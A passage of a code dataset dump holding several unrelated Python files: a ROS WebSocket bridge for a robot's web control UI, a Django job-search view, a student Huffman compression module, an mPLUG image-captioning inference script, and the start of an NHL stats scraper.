"stars": 13, "dataset": "github-code", "pt": "53", "api": [{"api_name": "num2words.num2words", "line_number": 15, "usage_type": "call"}, {"api_name": "re.match", "line_number": 18, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 30, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 39, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 40, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 42, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 43, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 44, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 62, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 118, "usage_type": "call"}]} +{"seq_id": "33881369147", "text": "\"\"\"GCS WebUI WebSockets server\n\nListens on several topics to serve WebSocket connections from our GCS WebUI, \nalso publishes to /pathy/dms, on request of the WebUI.\n\nSee /gcs/webui.html in the repo for the client-side part.\nNot to be confused with the Mavlink ground control software (QGroundControl/\nMission Planner).\n\"\"\"\n\nimport sys, base64, json\nfrom enum import Enum\nfrom typing import Any\n\nimport cv2\nimport numpy as np\n\nimport rclpy\nfrom rclpy.node import MsgType, Node\nfrom cv_bridge import CvBridge\nfrom sensor_msgs.msg import Image\nfrom std_msgs.msg import String, Empty\n\nimport asyncio\nimport websockets\n\n\ndef opencv_to_b64(img: np.dtype, img_type: str = \"png\") -> str:\n is_success, mask_buf = cv2.imencode(f\".{img_type}\", img)\n if not is_success:\n raise Exception(\"Could not encode image\")\n b64 = base64.b64encode(mask_buf.tobytes()).decode('utf-8')\n return b64\n\ndef b64_to_opencv(b64: str) -> np.dtype:\n img_bytes = base64.b64decode(b64)\n as_np = np.frombuffer(img_bytes, np.uint8)\n img = cv2.imdecode(as_np, cv2.IMREAD_ANYCOLOR)\n return img\n\nclass MessageType(Enum):\n RGB = \"RGB\"\n MASK = \"MASK\"\n PING = \"PING\" # https://stackoverflow.com/questions/10585355/sending-websocket-ping-pong-frame-from-browser\n PONG = \"PONG\"\n DMS = \"DMS\"\n STEER = \"STEER\"\n OFFLOADED_INFERENCE = \"OFFLOADED_INFERENCE\"\n\ndef create_websocket_msg(message_type: MessageType, data: Any):\n return json.dumps({\n \"type\": message_type.value,\n \"data\": data\n })\n\ndef parse_websocket_msg(msg: str):\n msg_obj = json.loads(msg)\n msg_type = MessageType[str(msg_obj[\"type\"])]\n msg_data = msg_obj[\"data\"]\n return msg_type, msg_data\n\ndef async_to_non_blocking(loop: asyncio.AbstractEventLoop, callback):\n def non_blocking_callback(**args): # TODO: args, kargs??\n loop.create_task(callback(**args))\n return non_blocking_callback\n\n\nclass GcsWebuiWsServer(Node):\n def __init__(self):\n super().__init__('gcs_webui_ws_server')\n loop = asyncio.get_event_loop()\n self.create_subscription(\n Image, '/pathy/rgb', async_to_non_blocking(loop, self._on_rgb), 10\n )\n # self.create_subscription(Image, '/pathy/mask', self._on_mask, 10)\n self.create_subscription(\n String, '/pathy/steering', \n async_to_non_blocking(loop, self._on_steering), 10\n )\n self._mask_pub = self.create_publisher(Image, '/pathy/mask', 10)\n self._dms_pub = self.create_publisher(Empty, '/pathy/dms', 10)\n self._bridge = CvBridge()\n self._clients = set()\n self._loop = asyncio.get_event_loop()\n\n async def init(self):\n await self._init_ws()\n self.get_logger().info('Init OK')\n \n async def serve_forever(self):\n self.get_logger().info('Running...')\n while not self.executor or self.executor.context.ok():\n rclpy.spin_once(self, timeout_sec=0)\n await asyncio.sleep(0) # yield\n\n async def _init_ws(self):\n await websockets.serve(self._on_new_client, \"0.0.0.0\", 5678)\n self.get_logger().info('Websocket init OK')\n\n async def _on_rgb(self, img_msg: Image):\n b64_img = opencv_to_b64(\n self._bridge.imgmsg_to_cv2(img_msg), img_type=\"jpg\")\n ws_msg = create_websocket_msg(MessageType.RGB, b64_img)\n await self._send_to_all(ws_msg)\n\n async def _on_mask(self, img_msg: Image):\n img = self._bridge.imgmsg_to_cv2(img_msg)\n await self._on_mask_async_parsed(img)\n\n async def _on_mask_async_parsed(self, img: np.dtype):\n return_msg_data = {\n \"type\": MessageType.MASK.value,\n \"data\": opencv_to_b64(img)\n }\n await self._send_to_all(json.dumps(return_msg_data))\n\n def _on_steering(self, msg: String):\n self._loop.create_task(self._on_steering_async(msg))\n\n async def _on_steering_async(self, msg: String):\n msg_obj = json.loads(msg.data)\n return_msg_data = {\n \"type\": MessageType.STEER.value,\n \"data\": {\n \"steer\": msg_obj[\"steer\"],\n \"throttle\": msg_obj[\"throttle\"]\n }\n }\n await self._send_to_all(json.dumps(return_msg_data))\n \n async def _send_to_all(self, data: str):\n if len(self._clients) > 0:\n await asyncio.gather(*[c.send(data) for c in self._clients], return_exceptions=False)\n\n async def _on_new_client(self, socket, path):\n self.get_logger().info('New client')\n self._clients.add(socket)\n try:\n async for msg in socket:\n await self._handle_ws_message(socket, msg)\n except websockets.ConnectionClosedOK:\n self.get_logger().info(\"Goodbye\")\n pass\n finally:\n self._clients.remove(socket)\n\n async def _handle_ws_message(self, socket, msg):\n msg_type, msg_data = parse_websocket_msg(msg)\n if msg_type == MessageType.PING:\n return_msg_data = {\n \"type\": MessageType.PONG,\n \"data\": None\n }\n await socket.send(json.dumps(return_msg_data))\n elif msg_type == MessageType.DMS:\n self.get_logger().info(\"DMS\")\n self._dms_pub.publish(Empty())\n elif msg_type == MessageType.OFFLOADED_INFERENCE:\n self.get_logger().info(\"Offloaded inference\")\n mask = b64_to_opencv(msg_data)\n mask_msg = self._bridge.cv2_to_imgmsg(np.array(mask))\n self._mask_pub.publish(mask_msg)\n await self._on_mask_async_parsed(mask)\n else:\n raise Exception(f\"Unknown message type: {msg_type}\")\n\n\nasync def main_async(args=None):\n rclpy.init(args=args)\n ws_server = GcsWebuiWsServer()\n await ws_server.init()\n await ws_server.serve_forever()\n ws_server.destroy_node()\n rclpy.shutdown()\n\n\ndef main(args=None):\n asyncio.get_event_loop().run_until_complete(main_async(args))\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n", "repo_name": "ubipo/pathy", "sub_path": "ros/pathy/pathy/gcs_webui_ws_server.py", "file_name": "gcs_webui_ws_server.py", "file_ext": "py", "file_size_in_byte": 6017, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.dtype", "line_number": 28, "usage_type": "attribute"}, {"api_name": "cv2.imencode", "line_number": 29, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 32, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cv2.imdecode", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.IMREAD_ANYCOLOR", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.dtype", "line_number": 35, "usage_type": "attribute"}, {"api_name": "enum.Enum", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 50, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 51, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 57, "usage_type": "call"}, {"api_name": "asyncio.AbstractEventLoop", "line_number": 62, "usage_type": "attribute"}, {"api_name": "rclpy.node.Node", "line_number": 68, "usage_type": "name"}, {"api_name": "asyncio.get_event_loop", "line_number": 71, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 73, "usage_type": "argument"}, {"api_name": "std_msgs.msg.String", "line_number": 77, "usage_type": "argument"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 80, "usage_type": "argument"}, {"api_name": "std_msgs.msg.Empty", "line_number": 81, "usage_type": "argument"}, {"api_name": "cv_bridge.CvBridge", "line_number": 82, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 84, "usage_type": "call"}, {"api_name": "rclpy.spin_once", "line_number": 93, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 94, "usage_type": "call"}, {"api_name": "websockets.serve", "line_number": 97, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 100, "usage_type": "name"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 106, "usage_type": "name"}, {"api_name": "numpy.dtype", "line_number": 110, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 115, "usage_type": "call"}, {"api_name": "std_msgs.msg.String", "line_number": 117, "usage_type": "name"}, {"api_name": "std_msgs.msg.String", "line_number": 120, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 121, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 129, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 133, "usage_type": "call"}, {"api_name": "websockets.ConnectionClosedOK", "line_number": 141, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 154, "usage_type": "call"}, {"api_name": "std_msgs.msg.Empty", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 161, "usage_type": "call"}, {"api_name": "rclpy.init", "line_number": 169, "usage_type": "call"}, {"api_name": "rclpy.shutdown", "line_number": 174, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 178, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 182, "usage_type": "attribute"}]} +{"seq_id": "27921765542", "text": "from django.shortcuts import render\nfrom job_search.models import Job\nfrom .forms import SearchBarForm\n\nfrom django.db.models import Q\n\nfrom functools import reduce\nimport operator\n\n# Create your views here.\n\ndef job_search_index(request):\n jobs = Job.objects.all()\n\n query = \"\"\n results = None\n\n form = SearchBarForm()\n if request.method == 'POST':\n form = SearchBarForm(request.POST)\n if form.is_valid():\n query = form.cleaned_data[\"query\"]\n if ',' in query:\n query = query.split(',')\n else:\n query = query.split(' ')\n\n print(query)\n\n descResults = Job.objects.filter(reduce(operator.and_, [Q(description__icontains=term) for term in query]))\n cityResults = Job.objects.filter(reduce(operator.and_, [Q(city__icontains=term) for term in query]))\n stateResults = Job.objects.filter(reduce(operator.and_, [Q(state__icontains=term) for term in query]))\n results = descResults | cityResults | stateResults\n else:\n form = SearchBarForm()\n\n context = {\n 'jobs': jobs,\n 'form': form,\n 'query': query if query else \"\",\n 'results': results\n }\n return render(request, 'job_search_index.html', context)\n\ndef job_detail(request, pk):\n job = Job.objects.get(pk=pk)\n context = {\n 'job': job\n }\n return render(request, 'job_detail.html', context)", "repo_name": "Gabriel0110/Entry-Level-X", "sub_path": "job_search/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1445, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "job_search.models.Job.objects.all", "line_number": 13, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "job_search.models.Job", "line_number": 13, "usage_type": "name"}, {"api_name": "forms.SearchBarForm", "line_number": 18, "usage_type": "call"}, {"api_name": "forms.SearchBarForm", "line_number": 20, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects.filter", "line_number": 30, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "job_search.models.Job", "line_number": 30, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 30, "usage_type": "call"}, {"api_name": "operator.and_", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.db.models.Q", "line_number": 30, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects.filter", "line_number": 31, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "job_search.models.Job", "line_number": 31, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 31, "usage_type": "call"}, {"api_name": "operator.and_", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.db.models.Q", "line_number": 31, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects.filter", "line_number": 32, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects", "line_number": 32, "usage_type": "attribute"}, {"api_name": "job_search.models.Job", "line_number": 32, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 32, "usage_type": "call"}, {"api_name": "operator.and_", "line_number": 32, "usage_type": "attribute"}, {"api_name": "django.db.models.Q", "line_number": 32, "usage_type": "call"}, {"api_name": "forms.SearchBarForm", "line_number": 35, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects.get", "line_number": 46, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects", "line_number": 46, "usage_type": "attribute"}, {"api_name": "job_search.models.Job", "line_number": 46, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "40715480860", "text": "################################################################\n# FILE: hzlib.py\n# WRITER: Roi Greenberg + roigreenberg + 305571234\n# EXERCISE : intro2cs ex9 2013-2014\n# Description: implement some function about Huffman tree and\n# compress and decompress data\n################################################################\n\nimport collections\nfrom bisect import bisect\n'''\nThis module contains several function for compress and decompress data, using\nthe Huffman code algorithm.\n'''\n\nMAGIC = b\"i2cshcfv1\"\nLEFT_TREE = 0\nRIGHT_TREE = 1\n\ndef symbol_count(data):\n \"\"\"the function return dictionary from item to number of returns in data\n Args: data - a data\n \"\"\"\n return collections.Counter(data)\n\n\ndef make_huffman_tree(counter):\n \"\"\"the function create a huffman tree of a given dictionary from item to\n number of returns\n Return tree of tuple of tuples represent the tree or None if dictionary\n is empty\n Args: counter - a dictionary (output of symbol_data)\n \"\"\"\n # create a list from the dictonary and sorted it from low repeats to high\n # and high value to low\n sort_list = sorted([(tuple0, counter[tuple0]) for tuple0 in counter], \\\n reverse=True )\n sort_list.sort(key=lambda leaf: leaf[1])\n\n # run until have only 1 tuple\n while len(sort_list) > 1:\n # take the first 2 tuples\n tuple1 = sort_list.pop(0)\n tuple2 = sort_list.pop(0)\n\n # calculate the combined repeats\n count = tuple1[1] + tuple2[1]\n\n #create new tuple of both tuple\n parent = ((tuple2[0], tuple1[0]), count)\n\n #create a list of all the reapets\n counts = [repeats[1] for repeats in sort_list]\n\n #insert the new tuple to the list in the right place\n sort_list.insert(bisect(counts, count), parent)\n\n return sort_list[0][0] if sort_list else None\n\n\ndef build_codebook(huff_tree):\n \"\"\"create a codebook of the Huffman tree\n the function recieve a huffman tree and return a dictionary from item\n to tuple of length and decimal value of the binary code represent the item\n Args:\n huff_tree - a coded tree of a recursive tuple structure\n (same structure of output of privious function).\n bin_item - a string. default is \"\".\n codebook - a dictionary. default is {}.\n \"\"\"\n new_codebook = {}\n def codebook(huff_tree, n=\"\"):\n # return empty dictionary in tree is empty\n if not huff_tree:\n return {}\n # return the dictionary in case tree is only 1 leaf\n elif type(huff_tree) is not tuple:\n return {huff_tree: (1, 0)}\n\n # the left branch\n left=huff_tree[LEFT_TREE]\n # the right branch\n right=huff_tree[RIGHT_TREE]\n\n # if got to leaf, add it to the dictionary\n # if not check the left branch in recursive way\n if type(left) is not tuple:\n binary_info = (len(n + \"0\"), int(n + \"0\", 2))\n new_codebook[left] = binary_info\n else:\n codebook(left, n + \"0\")\n \n # if got to leaf, add it to the dictionary\n # if not check the right branch in recursive way\n if type(right) is not tuple:\n binary_info = (len(n + \"1\"), int(n + \"1\", 2))\n new_codebook[right] = binary_info \n else:\n codebook(right, n + \"1\")\n \n return new_codebook\n return codebook(huff_tree)\n\n \n\ndef build_canonical_codebook(codebook):\n \"\"\"create a canonical codebook of the Huffman tree\n the function recieve a huffman codebook and return a dictionary from item\n to tuple of length and decimal value of the binary code represent the item\n in canonical way\n Args:\n codebook - a dictionary - table of char: code pairs.\"\"\"\n # create a list from the codebook and sorted it from low value to high and\n # low binary length to high \n new_list = sorted([[leaf,codebook[leaf][0]] for leaf in codebook])\n new_list.sort(key=lambda x: x[1])\n \n # return empty codebook if tree is empty\n if not new_list:\n return {}\n # take the length of the first item\n length=new_list[0][1]\n # calculate a new binary code the first item \n code = \"0\" + ''.join(\"0\" for i in range(length - 1))\n # create new dictonary with the first item with new values\n canonical_codebook={new_list[0][0]: (length,int(code,2))}\n # run for every item from the second one\n for item in new_list[1:]:\n # calculate a new binary code the item \n code = bin(int(code,2)+1)[2:]\n # add 0 to the end of the new code if it's length smaller then\n # the previus item code's\n if len(code) < length:\n code=code.zfill(length)\n # take the current length\n length=item[1]\n # add 0 to the begining of the new code if it's length smaller then\n # the original item code's\n code=code+\"\".join(\"0\" for i in range(length-len(code)))\n # add the new dictionary the item with new values\n canonical_codebook[item[0]] = (length, int(code, 2))\n \n return canonical_codebook\n\n \ndef build_decodebook(codebook):\n ''' return a dictionary from tuple of length and decimal value of the\n binary code to item built from a dictionary of item to tuple of length\n and decimal value of the binary code\n rgs:\n codebook - a dictionary - table of char: code pairs.\"\"\"\n '''\n # new dictionary\n decodebook = {}\n # add the new dictionary the value as key and key as value\n for item in codebook:\n decodebook[codebook[item]]=item\n return decodebook\n\ndef compress(corpus, codebook):\n \"\"\"the function create an iterator of 0 or 1 as ints, after iterating on\n corpus input.\n\n Args:\n corpus - a sequence of chars by a iterator.\n codebook - a dictionary - table of char: code pairs. \"\"\"\n\n # run for every item in corpus\n for item in corpus:\n # take the length and decimal values according to the codebook\n length = codebook[item][0]\n num = codebook[item][1]\n # convert to binary\n binary = bin(num)[2:].zfill(length)\n # iterator?????\n for char in binary:\n yield int(char)\n\ndef decompress(bits, decodebook):\n \"\"\"the function run over the decoding bits of coded bits input\n and create an iterator of 0 or 1 as an int.\n\n Args:\n bits - an iterable, a sequence of coded bits each is an int 0 or 1.\n decodebook - a dictionary, a decoded one\"\"\"\n # set a new binary code\n binary = \"\"\n # run for every bit\n for bit in bits:\n # add the current binary code the next bit\n binary = binary + str(bit)\n # create a tuple of length and decimal value of the binary code\n decode = (len(binary), int(binary, 2))\n # if the binary code is in the decodebook return his value and reset\n # the binary code\n if decode in decodebook:\n yield decodebook[decode]\n binary = \"\"\n\n\ndef pad(bits):\n \"\"\"the function run over each eight sequence bits out of the input,\n adds the 1 as a final bit and appends zeros for the total length be\n divided by 8. the function create an iterator of 0 or 1 as an ints.\n\n Args:\n bits - an iterable, a sequence of coded bits each is an int 0 or 1.\"\"\"\n # set a new binary code\n binary = \"\"\n # run for every bit\n for bit in bits:\n binary = binary + str(bit)\n # when binary code have length of 8 return the decimal value and reset\n # the binary code\n if len(binary) == 8:\n yield int(binary, 2)\n binary = \"\"\n # for the last bits, add single 1 and zeros until binary have length of 8\n binary = binary + \"1\"\n while len(binary) != 8:\n binary = binary + \"0\"\n # return the last binary code\n yield int(binary, 2)\n\ndef unpad(byteseq):\n \"\"\"the function run over all bytes of input, taking off the '0' and '1'\n on top of it and create an iterator of 0 or 1 as ints.\n\n Args:\n byteseq - an iterator, a sequence of bytes.\"\"\"\n # set a boolin for the first byte\n first = True\n # run for every byte\n for byte in byteseq:\n # for the first byte get his binary value and finish the corrent loop\n if first:\n binary = bin(byte)[2:].zfill(8)\n first = False\n continue\n \n # return every single bit as iterator\n for bit in binary:\n yield int(bit)\n # get the next byte binary value\n binary = bin(byte)[2:].zfill(8)\n # for the last byte, find the last \"1\" digit index\n index = -1\n bit = binary[index]\n while bit != \"1\":\n index -= 1\n bit = binary[index]\n # return the bits up to the last \"1\" digit\n for bit in binary[:index]:\n yield int(bit)\n\ndef join(data, codebook):\n \"\"\"the function run over the bytes of input (first codebook then data)\n and create an iterator of the codebook vals which appear, then the\n data items.\n\n Args:\n data - an iterator, a sequence of bytes.\n codebook - a canonical code table, the output of\n build_canonical_codebook.\"\"\"\n for key in range(256):\n if key in codebook:\n yield codebook[key][0]\n else:\n yield 0\n for data_0 in data:\n yield data_0\n\ndef split(byteseq):\n \"\"\"that function split the output of the function join to data and codebook\n the function return a tuple which is consist of a dictionary - canonical\n coding table and an iterator which iterate over rest of byteseq as\n byte sequent.\n\n Args:\n byteseq - an iterator, a sequence of bytes.\"\"\"\n index = 0\n codebook = {}\n data = []\n for byte in byteseq:\n if index < 256:\n if byte != 0:\n codebook[index] = (byte, 0)\n index += 1\n else:\n data.append(byte)\n codebook = build_canonical_codebook(codebook)\n return iter(data), codebook\n \n", "repo_name": "roigreenberg/Introduction-to-Computer-Science-2013-2014", "sub_path": "ex9/hzlib.py", "file_name": "hzlib.py", "file_ext": "py", "file_size_in_byte": 9947, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.Counter", "line_number": 24, "usage_type": "call"}, {"api_name": "bisect.bisect", "line_number": 56, "usage_type": "call"}]} +{"seq_id": "13437188850", "text": "import argparse, yaml, os, utils, torch, glob, cv2, numpy, time\nfrom pathlib import Path\nfrom models.tokenization_bert import BertTokenizer\nfrom models.model_caption_mplug import MPLUG\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nfrom optim import create_optimizer\nfrom models.vit import resize_pos_embed\nfrom PIL import Image\nfrom torchvision import transforms\n\nBLACK_BACKGROUND_HEIGHT = 50\nOUTPUT_WIDTH = 720\nOUTPUT_HEIGHT = 480\n\nclass ImageCaptionModel:\n\n def __init__( self, args, config):\n print(f\"Loading mPLUG model . . .\")\n utils.init_distributed_mode( args )\n self.device = torch.device( args.device )\n cudnn.benchmark = True\n self.tokenizer = BertTokenizer.from_pretrained( config['text_encoder'])\n self.model = MPLUG( config = config, tokenizer=self.tokenizer )\n self.model = self.model.to(self.device)\n self.optimiser = create_optimizer( utils.AttrDict(config['optimizer']), self.model )\n self.checkpoint = torch.load( args.checkpoint, map_location=\"cpu\" )\n \n try:\n self.state_dict = self.checkpoint['model']\n except:\n self.state_dict = self.checkpoint['module']\n \n num_patches = int(config[\"image_res\"] * config[\"image_res\"]/(16*16))\n pos_embed = nn.Parameter(torch.zeros(num_patches + 1, 768).float())\n pos_embed = resize_pos_embed(self.state_dict['visual_encoder.visual.positional_embedding'].unsqueeze(0),\n pos_embed.unsqueeze(0))\n self.state_dict['visual_encoder.visual.positional_embedding'] = pos_embed\n self.model.load_state_dict( self.state_dict, strict=False )\n self.model.eval()\n self.model.to( self.device )\n\n print(f\"Model loaded: {args.checkpoint}\")\n\n def generateDisplayImage( self, generated_caption, cv2_image ):\n display_text = f\"Caption: {generated_caption}\"\n black_background = numpy.zeros([ BLACK_BACKGROUND_HEIGHT, cv2_image.shape[1], 3], dtype=numpy.uint8)\n cv2.putText( black_background, display_text, (int(BLACK_BACKGROUND_HEIGHT/2), int(BLACK_BACKGROUND_HEIGHT/2)), cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 250, 0), 1, cv2.LINE_AA )\n stack_image = cv2.vconcat( [black_background, cv2_image] )\n return stack_image\n\n\n def inference( self, transfomred_image, cv2_image ):\n start_time = time.time()\n top_ids, _ = self.model( transfomred_image, \"\", train=False )\n cv2_image = cv2.resize( cv2_image, ( OUTPUT_WIDTH, OUTPUT_HEIGHT ))\n for id in top_ids:\n ans = self.tokenizer.decode(id[0]).replace(\"[SEP]\", \"\").replace(\"[CLS]\", \"\").replace(\"[PAD]\", \"\").strip()\n end_time = time.time()\n fps = 1 / ( end_time - start_time )\n display_image = self.generateDisplayImage( ans, cv2_image )\n cv2.imshow('output', display_image)\n cv2.waitKey(0)\n\n @staticmethod\n def load_image(image, image_size):\n device = \"cuda:0\"\n raw_image = Image.open(str(image)).convert('RGB')\n cv2_image = numpy.array( raw_image )\n cv2_image = cv2_image[:,:,::-1].copy()\n\n w, h = raw_image.size\n\n transform = transforms.Compose([\n transforms.Resize((image_size, image_size) ),\n transforms.ToTensor(),\n transforms.Normalize((0.48145466, 0.4578275, 0.40821073), (0.26862954, 0.26130258, 0.27577711))\n ])\n image = transform(raw_image).unsqueeze(0).to(device)\n return image, cv2_image\n \n\ndef getConfigurations():\n parser = argparse.ArgumentParser()\n parser.add_argument('--config', default='./configs/caption_mplug_base.yaml')\n parser.add_argument('--checkpoint', default='./mplug_base.pth')\n parser.add_argument('--device', default='cuda')\n parser.add_argument('--min_length', default=10, type=int)\n parser.add_argument('--max_length', default=25, type=int)\n parser.add_argument('--max_input_length', default=25, type=int)\n\n args = parser.parse_args()\n config = yaml.load(open(args.config, 'r'), Loader=yaml.Loader)\n\n # assign the config variables needed for model initialisation\n config[\"min_length\"] = args.min_length\n config[\"max_length\"] = args.max_length\n config['text_encoder'] = \"bert-base-uncased\"\n config['text_decoder'] = \"bert-base-uncased\"\n config['beam_size'] = 5\n config['optimizer']['lr'] = 2e-5\n\n return args, config\n\ndef main():\n\n args, config = getConfigurations()\n image_caption_model = ImageCaptionModel( args, config )\n image_folder = \"./sample_images/\"\n for image in glob.glob( image_folder + '/*' ):\n transformed_image, cv2_image = image_caption_model.load_image( image, image_size=config['image_res'] )\n image_caption_model.inference( transformed_image, cv2_image )\n\nif __name__ == \"__main__\":\n main()", "repo_name": "globalwalkers-aws/image_captioning", "sub_path": "mPLUG/inference.py", "file_name": "inference.py", "file_ext": "py", "file_size_in_byte": 4979, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.init_distributed_mode", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 22, "usage_type": "name"}, {"api_name": "models.tokenization_bert.BertTokenizer.from_pretrained", "line_number": 23, "usage_type": "call"}, {"api_name": "models.tokenization_bert.BertTokenizer", "line_number": 23, "usage_type": "name"}, {"api_name": "models.model_caption_mplug.MPLUG", "line_number": 24, "usage_type": "call"}, {"api_name": "optim.create_optimizer", "line_number": 26, "usage_type": "call"}, {"api_name": "utils.AttrDict", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 35, "usage_type": "call"}, {"api_name": "models.vit.resize_pos_embed", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 47, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 48, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 48, "usage_type": "attribute"}, {"api_name": "cv2.vconcat", "line_number": 49, "usage_type": "call"}, {"api_name": "time.time", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 56, "usage_type": "call"}, {"api_name": "time.time", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 62, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 68, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 68, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 69, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 74, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 74, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 75, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 75, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 76, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 76, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 77, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 77, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 84, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 93, "usage_type": "call"}, {"api_name": "yaml.Loader", "line_number": 93, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 110, "usage_type": "call"}]} +{"seq_id": "8863868696", "text": "import logging\nimport json\n\nimport pandas as pd\nimport urllib\nimport urllib.request\nimport sqlite3\nimport sqlalchemy as sa\n\nfrom tqdm import tqdm\n\nfrom settings import DATABASE_NAME\nfrom misc_functions import import_data_from_sql, get_json_data_from_link, insert_into_db\n\npd.set_option('display.max_columns', None)\n\nlogging.basicConfig(level='INFO')\nlogger = logging.getLogger()\n\n# Settings\nplayer_info_cols = ['player_id', \n 'firstName', 'lastName', 'nationality', 'birthCity',\n 'position',\n 'birthDate',\n 'birthStateProvince',\n 'height',\n 'weight', 'shootsCatches']\n\n\nengine = sa.create_engine(f'sqlite:///{DATABASE_NAME}')\n\nurl_prefix = 'https://statsapi.web.nhl.com'\npeople_prefix = '/api/v1/people/'\n\n\ndef get_player_info(player):\n \n player_info_df = pd.DataFrame([], columns=player_info_cols)\n \n player_id = player['player_id']\n player_url = url_prefix + people_prefix + str(player_id)\n player_details_dict = get_json_data_from_link(player_url)\n\n if player_details_dict is None:\n return None\n\n player_dict = player_details_dict.get('people')\n player_info_df = player_info_df.append(player_dict[0], ignore_index=True)\n \n if len(player_dict) > 1:\n logger.warning('MORE THAN ONE PERSON!')\n\n # Extract useful primary position\n if 'primaryPosition' in player_info_df.columns:\n\n player_position_dict = player_info_df[['primaryPosition']].to_dict(orient='index')\n\n primary_position_dict = [[id, data.get('primaryPosition').get('abbreviation') ]\n for id, data in player_position_dict.items()]\n \n position_df = pd.DataFrame(\n primary_position_dict, columns=['index', 